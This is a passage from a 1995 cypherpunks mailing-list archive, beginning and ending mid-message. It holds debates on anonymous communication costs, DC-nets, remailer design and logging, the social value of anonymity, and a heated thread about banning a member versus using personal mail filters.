mixes] > The problem here is that you'll have to do a RSA operation on EACH > packet. Pretty hard on the CPU... Yes, good point. It might be possible to use a stream model where the separate packets which make up a stream use the same conventional key. This allows the various packets which make up a stream to be identified as such by outsiders, but still if there are a large number of virtual streams going through the network at one time it should be possible to confuse the streams pretty well. ("I've got a crazy idea. Let's cross the streams!" -- Ghostbusters). Then you only need to do the RSA work at setup time, and you need a fast streaming cypher during the conversation. This is how the streaming-packet encryption models like IPSP or Netscape's SSL seem to work. > > I think it may be more useful rather than speaking of "true" anonymity > > to think of factor-of-N anonymity. This reflects the bandwidth costs. I > > would guess that, if you have a packet-based video converencing system, > > that today you could probably get factor-of-2 anonymity with custom > > hardware, and perhaps even more than that. > > I'm not exactly sure what you mean by "factor-of-N". I only used "true" > to distiguish it from "trivial" anonymity (such as using a pay phone). > Of course, anonymity, like security, can only be relative. By "factor-of-N" I meant anonymity where you can only pin the source of a message down to one of N possibilities. It appears to me that many of the costs will be a function of N. It will be relatively easier to cloak your source as one of say 50 possibilities than to make it any of one in a million. This is why I suggested that factor-of-2 anonymity would be the easiest. The DC-Net concept would allow two users to share a cryptographically strong pseudo-random stream, and each of them to XOR their video output with the random stream; then these modified outputs from each of them are themselves XOR'd together to produce the joint output. As long as only one sends at a time, the resulting stream is their output, but it is impossible for an outsider to determine which one is sending. The hardware requirements seem quite modest and perhaps would be adequate today even for video. > [My points about limitations on suitability of anonymity] > > This is all very true. I guess I'm just lamenting the loss of my ealier, > more naive dream that one day everyone will be anonymous (read > pseudonymous), and that physical and digital identities will be totally > seperate. I don't think we would really expect everyone to be anonymous all of the time. In our personal lives, with friends and family, it doesn't seem appropriate to expect anonymity (although my earlier quotes from Greg Bear's sci fi story suggest differently). But still I think that for people who desire it and are willing to pay the prices, anonymity would indeed be available in many or most electronic communications. So if that is your desire you should be able to achieve it. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLw9Q1xnMLJtOy9MBAQEhPwH+KSYD4KhA1HOUxqOzdb2WdMuq0i1XTFzH fKMnejTqlKVbFfEnQqfHukwKpH5nFpuN7towJ1o98aGqT1ACxbSjpQ== =2mxw -----END PGP SIGNATURE----- From m00012 at KANGA.STCLOUD.MSUS.EDU Sat Jan 7 19:30:25 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Sat, 7 Jan 95 19:30:25 PST Subject: carrol( Message-ID: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU> What is wrong with this person? ban her if you can, that's my opnion. From root at einstein.ssz.com Sat Jan 7 19:44:19 1995 From: root at einstein.ssz.com (root) Date: Sat, 7 Jan 95 19:44:19 PST Subject: carrol( In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU> Message-ID: <199501080230.UAA00614@einstein.ssz.com> > > > What is wrong with this person? > > ban her if you can, that's my opnion. > Hi all, For what it is worth, I oppose banning in any manner, shape, or form. There is no morale or ethical justification for it. Take care. From nelson at crynwr.com Sat Jan 7 20:19:31 1995 From: nelson at crynwr.com (Russell Nelson) Date: Sat, 7 Jan 95 20:19:31 PST Subject: carrol( In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU> Message-ID: Date: Sat, 07 Jan 1995 21:31:45 CST From: m00012 at KANGA.STCLOUD.MSUS.EDU What is wrong with this person? ban her if you can, that's my opnion. Gee, I don't know what everyone is complaining about, because I have: if (from = "carolann at mm.com") then delete in my ~/.elm/filter-rules file. I highly encourage everyone to have their own mail filters, because then you don't have to convince anyone to ban anyone, you just do your own banning. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From warrior at infinet.com Sat Jan 7 20:52:02 1995 From: warrior at infinet.com (Dave Harvey) Date: Sat, 7 Jan 95 20:52:02 PST Subject: carrol( In-Reply-To: Message-ID: Could you tell me how to do this with Pine? I would love to know how. Regards, Dave > Gee, I don't know what everyone is complaining about, because I have: > > if (from = "carolann at mm.com") then delete > > in my ~/.elm/filter-rules file. I highly encourage everyone to have > their own mail filters, because then you don't have to convince anyone > to ban anyone, you just do your own banning. ___ /\ PGP the Cutting Edge of Privacy. /vvvvvvvvvvvv \-----------------------------------\ | WARRIOR ( | PGP Key Id 0XC554E447D > Magnus Frater Videt Tu `^^^^^^^^^^^^ /===================================/ \/ Finger for PGP 2.6.2 public Key. PGP Fingerprint 15 99 09 6D 11 C8 7C E0 08 C7 E6 95 46 65 FE F0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | Dave M. Harvey warrior at infinet.com| | PO Box 151311 dharvey at freenet.columbus.oh.us| | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From pstemari at erinet.com Sat Jan 7 20:53:29 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 7 Jan 95 20:53:29 PST Subject: Too Much! Message-ID: <9501080445.AA23191@eri.erinet.com> At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote: >You might want to try reading it from NNTP, via c2.org or hks.net. You >can then use Kill files. At that point, isn't the mailing list simply becoming a newsgroup? For that matter, is there some reason that escapes me why it ISN'T a newsgroup? I suppose the proportion of net.kooks is higher in a newsgroup than a mailing list, but arguably we're ALL net.kooks here. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pstemari at erinet.com Sat Jan 7 20:53:49 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 7 Jan 95 20:53:49 PST Subject: Soapbox mode on!(but short) Message-ID: <9501080445.AB23191@eri.erinet.com> At 01:22 AM 1/7/95, Carol Anne Braddock wrote: >Dear Paul J. Ste. Marie, > >I was quietly going through my mail after an eight hour layoff. >The first thing you do is lie. > >I have called you a liar. Point Blank! > >And for the honor of this very list, so that there is some >credibility, I shall retrieve from a tin reader the actual >posting, COMPLETE WITH HEADER. Interesting. You did retrieve the message I posted, but not the article from alt.current-events.net-abuse. If you want to call me a liar, that's fine, but post something with some relevance. I'm not in the habit of scanning the news hierarchy for spam, and I'm perfectly willing to believe you stopped after ten groups, but that isn't what I recalled seeing in a.c-e.n-a. I could be remebering things wrong, but if that is the case, kindly post something that actually shows the discussion in a.c-e.n-a was otherwise. >And what makes creeps like you going is the ability to continue, >to spread those lies. And now you're sounding like Martha Siegel. My words were: >> The discussion on alt.current-events.net-abuse seemed to indicate that the ^^^^^^^^^^^^^^^^^^ >> claim of "Just 10" above is a slight understandment. The newsgroups seem to >> have been hit alphabetically, and I believe the total count was in the >> hundreds. Am I rememebering a.c-e.n-a inaccurately, or have you simply decided not to rebut anything in the forum in which it was presented? All I suggested is that your account bore checking out before people leaped to your defense. An unwillingness to have your story verified speaks for itself. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From m00012 at KANGA.STCLOUD.MSUS.EDU Sat Jan 7 21:17:19 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Sat, 7 Jan 95 21:17:19 PST Subject: carrol( Message-ID: <0098A20D.79070F00.2@KANGA.STCLOUD.MSUS.EDU> I would put her in my killfile, but I don't know if vms has a kill file capibility. I use my unix accounts for important email, and do not want to have to sift through the volume I get from the cypherpunks. Otherwise, given that the percentage of interesting posts is going down as a result of carrolann (and perhaps me too now), I think having an elite group capable of banning certain people is perfectly ethical. mike From rah at shipwright.com Sat Jan 7 21:35:12 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 7 Jan 95 21:35:12 PST Subject: cipher magazine Message-ID: Someone just gave me this URL. It's probably in the cyphernomicon already, but I had fun rooting around in here and thought I'd pass it around to those who haven't seen it yet. http://www.itd.nrl.navy.mil:80/ITD/5540/ieee/cipher/ Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From a015880t at bcfreenet.seflin.lib.fl.us Sat Jan 7 21:43:02 1995 From: a015880t at bcfreenet.seflin.lib.fl.us (Jonathan Nelson) Date: Sat, 7 Jan 95 21:43:02 PST Subject: how to subscribe Message-ID: can someone please mail me where to post to get subscribed Jonathan Nelson a015880t at bcfreenet.seflin.lib.fl.us From jamesd at netcom.com Sat Jan 7 22:13:50 1995 From: jamesd at netcom.com (James A. Donald) Date: Sat, 7 Jan 95 22:13:50 PST Subject: From me to me to you...The Actual Article In-Reply-To: Message-ID: The world is full of self important assholes. You will go mad trying to deal with people like him. Life is too short. From time to time post messages belittling him and his service, and get on with a new service. If you find a reasonably priced 28KB SLIP connection let me know. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Sat Jan 7 22:23:30 1995 From: jamesd at netcom.com (James A. Donald) Date: Sat, 7 Jan 95 22:23:30 PST Subject: Big vs Little providers (punkette view) In-Reply-To: Message-ID: On Sat, 7 Jan 1995, Carol Anne Braddock wrote: > Yes, at Netcom, I can now probably get much further, much faster. > No I wouldn't subject myself or anyone to Winternet. But I wouldn't > subject a newbie to Netcom either. I did it once and was sorry, too. Actually you cannot. No web pages, and their ftp is really bad. I put my web stuff on http://nw.com/jamesd/ Cheap, good bandwidth, but I have trouble getting usage statistics. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From mkj at october.ducktown.org Sat Jan 7 23:42:50 1995 From: mkj at october.ducktown.org (mkj at october.ducktown.org) Date: Sat, 7 Jan 95 23:42:50 PST Subject: The Value of Anonymity Message-ID: <199501080700.CAA00298@october.ducktown.org> -----BEGIN PGP SIGNED MESSAGE----- The value of anonymity, both on the nets and off, seems to be poorly understood, even among its strongest defenders. The positive value of anonymity is not merely about protecting a few special groups such as sexual-abuse victims and whistleblowers. While these are certainly valuable uses, if I believed that anonymity's positive impact were limited to these outside-the-mainstream groups, then I probably wouldn't accept the benefits of anonymity as outweighing its costs. But in fact, I believe that anonymity has crucially important benefits for nearly everyone. There are several good arguments to be made, but in the interest of brevity I'll focus on only one: The explosive development of such personal data industries as targeted marketing and consumer and demographic profiling, have demonstrated that the business community considers personal data to be of great economic value. (There's a parallel observation to be made here about governments, but I won't go into that now.) There are also myriad uses being made of personal data throughout the professions, from labor negotiators to house burglars. It is something of a truism that anyone who knows enough about you can probably find a way to beat you, either legally or illegally, often at great profit to themselves. In an information-age society without extremely strong privacy protections, the chief factor which makes the difference between winners and losers may be how much information each of us has on others, and how much they have on us. Given this degree of economic and social motivation, it is easy to imagine the sort of panopticon which will soon arise on the Internet (and its descendants), unless the strongest possible protections are adopted. (And it is equally easy to imagine who the biggest winners and losers will be.) Relying on government to protect personal privacy is like appointing the fox to guard the henhouse (or, as I seem to recall John Perry Barlow once putting it, "... getting a peeping tom to install your window blinds," or something like that). In addition to the government's own motivations for eroding privacy, all the above economic considerations enter into government through lobbying, desires to maximize tax revenues, fund-raising considerations, and a whole raft of other avenues. Furthermore, the only tools which government could bring to bear would be a complex web of laws and regulations governing the circulation of personal data. Such laws and regulations would have to constantly shift in a never ending cat-and-mouse game with business; and what's more, many of these laws and regulations would necessarily conflict with the free speech rights of private organizations. Bottom line: Anonymity is the only available tool which puts control over my own privacy firmly into my own hands, where it belongs, and does so without infringing on anyone's freedom of speech. Certainly there are drawbacks, and anonymity may invite some abuses; but we have survived anonymity's problems in the past, and 'tis better to suffer in the hell we know than to be dragged into a new and hotter one. The only society without any crime is a society without any freedom. My ($.02) conclusion: For preserving meaningful privacy, and for preventing an ugly and probably irreversible transformation of our world, anonymity is the best, perhaps the only viable tool we have. --- mkj -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw+MZF11Wd4tm8clAQHC3QP8DrxVrUAUM+UKKeKzosFmCXGLkuwJYGDS nE+pFEFIDC8cq7/35h99oIrCszmnkIjwso8PhwlwqRzuxFTZPMI3XuK5wt95tJCL 6Iy2oQ7wjCv+xnL2QjdAGNl68WD0ZhmPv9Q62cvWYjzRXnQJJF7dZiES5l14/NM2 Ij4rLh8AdEo= =OGBF -----END PGP SIGNATURE----- From lcottrell at popmail.ucsd.edu Sun Jan 8 00:08:15 1995 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Sun, 8 Jan 95 00:08:15 PST Subject: Remailer Abuse Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > >See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ? >If someone is logging messages and routing, it's less secure, but then so is >the entire remailer system. Prime remailer operators are those who don't >log. > >Maybe message size would tip off snoopers. This can be overcome with minor >tweaking to existing remailer code by tacking on or or eliminating padding >to messages. But logging still makes the whole system extremely vulnerable. > >=D.C. Williams > Message size can best be handled by using a remailer which uses messages which never change size. Mixmaster is now ready for testing. It still does not run on Linux or FreeBSD. I don't know what else it does run on. It works great on Sun machines with gcc. Since it is export restricted, send me mail and I will send you the name of the hidden directory to get the file. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLw+btVVkk3dax7hlAQFW/QP9GZAIODaKt/VYsDGWUExiY4NUapvnQpZ/ FWtucyqX+4v9JnJv318PaKEs5xqHMcqtdq0fGZn6qNe1k5MbSVBb5wzfclMQm3LY J7b3qv8zymedXpcmM2hm6bCnbpJkRivIjJTCDmg2yMKRH1Uv+Le5eN2haRxw3d76 e51KLqZJbh4= =BKtC -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From carolb at barton.spring.com Sun Jan 8 03:15:57 1995 From: carolb at barton.spring.com (carolb) Date: Sun, 8 Jan 95 03:15:57 PST Subject: The Value of Anonymity In-Reply-To: <199501080700.CAA00298@october.ducktown.org> Message-ID: No, sometimes you don't learn till you've made a mistake. As you could see I hurt really badly yesterday. And now, so I can occupy myself quietly for a few days, are there some good files to read so I can understand, and become a good remailer? RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM On Sun, 8 Jan 1995 mkj at october.ducktown.org wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > The value of anonymity, both on the nets and off, seems to be poorly > understood, even among its strongest defenders. The positive value of > anonymity is not merely about protecting a few special groups such as > sexual-abuse victims and whistleblowers. While these are certainly > valuable uses, if I believed that anonymity's positive impact were > limited to these outside-the-mainstream groups, then I probably > wouldn't accept the benefits of anonymity as outweighing its costs. > > But in fact, I believe that anonymity has crucially important benefits > for nearly everyone. There are several good arguments to be made, but > in the interest of brevity I'll focus on only one: > > The explosive development of such personal data industries as targeted > marketing and consumer and demographic profiling, have demonstrated > that the business community considers personal data to be of great > economic value. (There's a parallel observation to be made here about > governments, but I won't go into that now.) There are also myriad > uses being made of personal data throughout the professions, from > labor negotiators to house burglars. It is something of a truism that > anyone who knows enough about you can probably find a way to beat you, > either legally or illegally, often at great profit to themselves. > > In an information-age society without extremely strong privacy > protections, the chief factor which makes the difference between > winners and losers may be how much information each of us has on > others, and how much they have on us. Given this degree of economic > and social motivation, it is easy to imagine the sort of panopticon > which will soon arise on the Internet (and its descendants), unless > the strongest possible protections are adopted. (And it is equally > easy to imagine who the biggest winners and losers will be.) > > Relying on government to protect personal privacy is like appointing > the fox to guard the henhouse (or, as I seem to recall John Perry > Barlow once putting it, "... getting a peeping tom to install your > window blinds," or something like that). In addition to the > government's own motivations for eroding privacy, all the above > economic considerations enter into government through lobbying, > desires to maximize tax revenues, fund-raising considerations, and a > whole raft of other avenues. > > Furthermore, the only tools which government could bring to bear would > be a complex web of laws and regulations governing the circulation of > personal data. Such laws and regulations would have to constantly > shift in a never ending cat-and-mouse game with business; and what's > more, many of these laws and regulations would necessarily conflict > with the free speech rights of private organizations. > > Bottom line: Anonymity is the only available tool which puts control > over my own privacy firmly into my own hands, where it belongs, and > does so without infringing on anyone's freedom of speech. Certainly > there are drawbacks, and anonymity may invite some abuses; but we have > survived anonymity's problems in the past, and 'tis better to suffer > in the hell we know than to be dragged into a new and hotter one. The > only society without any crime is a society without any freedom. > > My ($.02) conclusion: For preserving meaningful privacy, and for > preventing an ugly and probably irreversible transformation of our > world, anonymity is the best, perhaps the only viable tool we have. > > --- mkj > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLw+MZF11Wd4tm8clAQHC3QP8DrxVrUAUM+UKKeKzosFmCXGLkuwJYGDS > nE+pFEFIDC8cq7/35h99oIrCszmnkIjwso8PhwlwqRzuxFTZPMI3XuK5wt95tJCL > 6Iy2oQ7wjCv+xnL2QjdAGNl68WD0ZhmPv9Q62cvWYjzRXnQJJF7dZiES5l14/NM2 > Ij4rLh8AdEo= > =OGBF > -----END PGP SIGNATURE----- > From hfinney at shell.portal.com Sun Jan 8 09:41:01 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 8 Jan 95 09:41:01 PST Subject: The Value of Anonymity Message-ID: <199501081741.JAA05815@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: mkj at october.ducktown.org > The value of anonymity, both on the nets and off, seems to be poorly > understood, even among its strongest defenders. The positive value of > anonymity is not merely about protecting a few special groups such as > sexual-abuse victims and whistleblowers. While these are certainly > valuable uses, if I believed that anonymity's positive impact were > limited to these outside-the-mainstream groups, then I probably > wouldn't accept the benefits of anonymity as outweighing its costs. These are good points. However I think your presentation is a little too oriented towards the libertarian perspective of distrusting government, and also comes off sounding harshly competitive: > It is something of a truism that > anyone who knows enough about you can probably find a way to beat you, > either legally or illegally, often at great profit to themselves. > > In an information-age society without extremely strong privacy > protections, the chief factor which makes the difference between > winners and losers may be how much information each of us has on > others, and how much they have on us. I think most people don't think so much in terms of winners and losers, of beating and being beaten. Rather, I think it will be more acceptable to couch the issue in simple privacy terms. People do value their privacy. I don't think you have to overly justify the value of privacy. A few examples of how little privacy people could actually have in a non-anonymous network of the future should suffice to establish motivation IMO. > Given this degree of economic > and social motivation, it is easy to imagine the sort of panopticon > which will soon arise on the Internet (and its descendants), unless > the strongest possible protections are adopted. I like this phrase! It nicely connotes the transparency of the nets. > Relying on government to protect personal privacy is like appointing > the fox to guard the henhouse (or, as I seem to recall John Perry > Barlow once putting it, "... getting a peeping tom to install your > window blinds," or something like that). In addition to the > government's own motivations for eroding privacy, all the above > economic considerations enter into government through lobbying, > desires to maximize tax revenues, fund-raising considerations, and a > whole raft of other avenues. This is where I think you are getting too libertarian for a broad audience. Also, this wording invites the reader to assume that anonymity will lead to tax avoidance and evading laws. Most people feel that they are paying their own taxes, and if others avoid them then it just increases the burden on themselves. So except to certain selected groups I would avoid playing this angle up. I think your next argument will have wider appeal: > Furthermore, the only tools which government could bring to bear would > be a complex web of laws and regulations governing the circulation of > personal data. Such laws and regulations would have to constantly > shift in a never ending cat-and-mouse game with business; and what's > more, many of these laws and regulations would necessarily conflict > with the free speech rights of private organizations. Be aware that this is in fact the "mainstream" solution to the problem. There was some discussion on comp.org.eff.talk of some kind of committee headed by EFF board member Esther Dyson which issued a statement on privacy protection in the nets. They issued the by-now traditional call for laws along the lines of "information collected for one purpose cannot be used for another purposes". Like, VISA can't sell data on your spending patterns, at least not without telling you. Nobody criticized this point; even the relatively net-aware civil liberties types mostly explicitly endorsed this provision. Laws like this are apparently already in place in Europe. So the momentum is in exactly this direction. I think your arguments are good ones; the government would undoubtedly exempt itself from such rules (the IRS is already starting to use dataveillance and matching to look for discrepencies between tax returns and spending patterns), plus such provisions would seem to require a labyrinth of exceptions, special cases, etc. Eventually I could see laws telling exactly what a business can and cannot do with the names of people who phone or net in for information; yes, they can be kept on a list for up to 6 months and sent additional promotional literature, except that the business must require standard form 11832 to allow the customer to get his name off the list, which must be handled within 5 working days for businesses with more than 100 employees, etc., etc. You could have volumes of this kind of stuff. I think Tim wrote some essays a long time back pointing out the absurdity of this approach, especially if you tried to apply it to private individuals. > Bottom line: Anonymity is the only available tool which puts control > over my own privacy firmly into my own hands, where it belongs, and > does so without infringing on anyone's freedom of speech. Certainly > there are drawbacks, and anonymity may invite some abuses; but we have > survived anonymity's problems in the past, and 'tis better to suffer > in the hell we know than to be dragged into a new and hotter one. The > only society without any crime is a society without any freedom. > > My ($.02) conclusion: For preserving meaningful privacy, and for > preventing an ugly and probably irreversible transformation of our > world, anonymity is the best, perhaps the only viable tool we have. That's a good summary. This is definately an uphill battle, though. I see no significant standards body or organization of influence (except for CPs, to the extent that we have any influence) which is moving in this direction. Add to this the costs of anonymity as Wei has been discussing and it really isn't clear how to proceed. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLxAj1xnMLJtOy9MBAQGujQIAqooWk8OsbJzbAGpxIP+EYnPJM0kA7Ojm /3i04Odoq/YZEH1Fv81/RbwsDahe+AGtmqU+VQ1KpjUTJuPfNKJ4dQ== =w/FH -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Sun Jan 8 11:29:40 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sun, 8 Jan 95 11:29:40 PST Subject: Anonymity and cost In-Reply-To: <199501080018.QAA11241@netcom4.netcom.com> Message-ID: <199501081921.AA00714@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Tim May wrote: > > At a very basic level, anonymous (not pseudonymous, like the remailers > > are) messages are *cheaper*, because they carry less information; they > > do not need to send the bits which identify the sender. > I think the meaning of "anonymous" here is clearly with respect to > _traffic analysis_. The "cost of anonymity" is with respect to the > costs and delays of using digital mixes (remailers)). I don't think it's useful to redefine "anonymous" to include some messages which identify the author, and to exclude some messages which do not identify the author. Then again, I'm not sure it's useful to play Language Cop, either. But count mine as a voice in favor of describing accurately what's being discussed. (Perhaps messages which defy traffic analysis might be called "untraceable" but not "anonymous", unless they also do not identify an author.) > > Anonymous video conferencing is available now; go to Kinko's, pay > > cash for the use of their video conference room. Or, ask/convince > > the recipient to consider the conversation "off the record". > Neither of these kinds of "anonymity" are cryptographically > interesting, or strong. I agree. I fear I've been influenced by some of the authors on that Cypher[something] list who've recently argued persausively in favor of applying technology appropriate to local conditions; e.g., not wasting time on the techno-gadget-of-the-month when more pedestrian but functional means are available. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxA7I33YhjZY3fMNAQGIQAQAqzEU6ru3/9/ScfHCZ6DnVK8bDewPVrg2 LAAZpVWuxfAW0W1oJ7NSXxrMmrIEX7MJetrpzlb+D5A1JuOVdtJ8gUwMxCRIMOeI LU78Q/MuSp1oWbPEARDJ6JLZztU3Zs0bQH13kTY1tSZaZlQWj/cmWKUrmis4ZRkE +px7kuMB8lg= =Ty1L -----END PGP SIGNATURE----- From cactus at hks.net Sun Jan 8 11:54:15 1995 From: cactus at hks.net (L. Todd Masco) Date: Sun, 8 Jan 95 11:54:15 PST Subject: Too Much! Message-ID: <199501081959.OAA21945@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Paul J. Ste. Marie writes: > At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote: > >You might want to try reading it from NNTP, via c2.org or hks.net. You > >can then use Kill files. > > At that point, isn't the mailing list simply becoming a newsgroup? For that > matter, is there some reason that escapes me why it ISN'T a newsgroup? I > suppose the proportion of net.kooks is higher in a newsgroup than a mailing > list, but arguably we're ALL net.kooks here. Not really, not until a huge number of hosts carry it as a newsgroup. As for why cypherpunks isn't a newsgroup... IMO, it would end up carrying too much traffic and be way too high profile. As is, the people who really want to find it will and a hordes of riff-raff (not all, mind you) are less likely to bother with it. -- Todd - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxBD/yoZzwIn1bdtAQHMrAF8ChmS332TabEbGslXsxzOLqIHEBOnJBYs KIdzflR9PJWsYuNJBH6LrHtBWK/q7ejP =T4k6 -----END PGP SIGNATURE----- From storm at marlin.ssnet.com Sun Jan 8 13:24:19 1995 From: storm at marlin.ssnet.com (Don Melvin) Date: Sun, 8 Jan 95 13:24:19 PST Subject: Remailer Abuse In-Reply-To: <199501070554.VAA14679@netcom9.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I'm joining this a bit late, but if you take the concept proposed earlier about sticking a remailer stamp on each encrypted envelope and that stamp being removed by the remailer, each remailer will get paid for handling the message. The anonymity (assuming an FV-type postage sale) can be restored by having one or more trusted postage exchanges. You buy a hundred stamps, send them to the exchange, and get back ninety-nine stamps from a pool. You now have a valid remailer stamp that does not have a link to you. Of course, to keep the purchasers honest, the stamps should probably be send from the purchase point (FV in this example). And there would also have to be a fast clearing house so stamps can't be reused/copies. - -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw9nAmvyi8p8VUiJAQHAsAQAj+hPIqS8lKFgRSr+m/aqrDp96W/ZTAw6 icQoAserp1gdWeOOaYKVZOgFA4Fn4BRM1ghs6mKO9nInVqJf9rCLpPhRCQ7ABPUi lR9mHq4ib4wA7cWzpraXy+Bf6eht0DaPHO8aUFW1Hz8wDGLjtamzrknjhnUGyS1Z LaKifu4R2o8= =NXlf -----END PGP SIGNATURE----- From jrt at asiaonline.net Sun Jan 8 13:46:50 1995 From: jrt at asiaonline.net (jRT) Date: Sun, 8 Jan 95 13:46:50 PST Subject: A Fire Upon the Deep In-Reply-To: Message-ID: When we say 'anonymous video-conferencing' here, I take it that's not the same as in videophones whereby you sit there and have your mugshot transmitted across to the other party... that would be distinctly un-anonymous :) The thing being, say you set up an anonymous-video-or-otherwise-remailer, you have to ensure that people don't manage to get into that as such would obviously give away the identities of all parties. Given that people can supposedly hack the DOD computer system, that doesn't seem so unlikely, so are anonymous-remailers really all that safe? ------------------------------------------------------------------------------ jrt at AsiaOnline.Net john at AsiaOnline.Net PO Box 86141, Govt PO, Kln, HKG. Computers Communications Reduced Rate IDD Service Innovative Widgets Help protect the environment : This message is made from recycled electrons ------------------------------------------------------------------------------ On Sat, 7 Jan 1995, Wei Dai wrote: > On Sat, 7 Jan 1995, Adam Shostack wrote: > > Anonymous mail has bandwidth costs that are only slightly > > higher than regular mail. You could hide quite a bit in most video > > packets. The latency is a reflection of the lack of volume, because > > volume is needed for reordering. If your favorite remailer gets more > > mail, the latency will drop. > > Anonymous e-mail that goes through a chain of N remailers will cost at > least N times as much bandwidth and have N times as much latency as normal > e-mail. But e-mail is hardly the state-of-the-art of network > communication, while anonymous e-mail IS the state of the art for > anonymous communication. How long will it take for the technology of > anonymous video conferencing to develope, for example? By then, of > course, those who are not concerned with anonymity will probably have > things such as full sensory virtual interaction. > > Note that I SUPPORT anonymous communication, but its costs of bandwidth > and latency may be a real obsticle to developing Cryptoanarchy (of the > kind described by Tim May) if most people are not willing to put up with > those costs. > > Wei Dai > PGP encrypted mail welcome. > > From jrt at asiaonline.net Sun Jan 8 13:48:45 1995 From: jrt at asiaonline.net (jRT) Date: Sun, 8 Jan 95 13:48:45 PST Subject: ANONYMOUS REMAILERS In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com> Message-ID: Oops, what I meant to add onto that last bit was that if you're required to keep records of the to and from, and especially the contents, you are severely likely to be raided by some govt agency whenever they wanna see who said what. I'd think twice about using a remailer that kept records on it all. ------------------------------------------------------------------------------ jrt at AsiaOnline.Net john at AsiaOnline.Net PO Box 86141, Govt PO, Kln, HKG. Computers Communications Reduced Rate IDD Service Innovative Widgets Help protect the environment : This message is made from recycled electrons ------------------------------------------------------------------------------ From wcs at anchor.ho.att.com Sun Jan 8 18:18:53 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Sun, 8 Jan 95 18:18:53 PST Subject: The Value of Anonymity Message-ID: <9501090217.AA13075@anchor.ho.att.com> Hear, hear! mkj's article on anonymity is worth reading. >From my perspective, the most important thing cryptography offers us is not just the ability to have private conversations without eavesdroppers; it's the ability to change the balance of power from the centralized control and accumulation of information that computers bring back to a level where _you_ can control what happens to your personal data. Do you _like_ starting transactions by giving some big company your Social Security Number which lets them, and everyone else, know everything you've ever done, where you live, how you vote, what you buy? We can move to a society where you can give the other party as much information as they need to do business with you, without having to give them everything else, or connect this transaction to all your others. Sometimes that means giving people more detail than you give them now, usually less. Cryptography becomes the technical glue to control how much you tell somebody on each transaction, anywhere from total anonymity to deep personal information, to let you have a driver's license that says "yes this person is a safe driver" without it becoming the key to your bank account of you lose your wallet, to have voter's registration that doesn't permit fraud but doesn't require universal identification. Some good technical references are the set of papers that David Chaum published about blind signatures and anonymous credentials. Bill From skaplin at 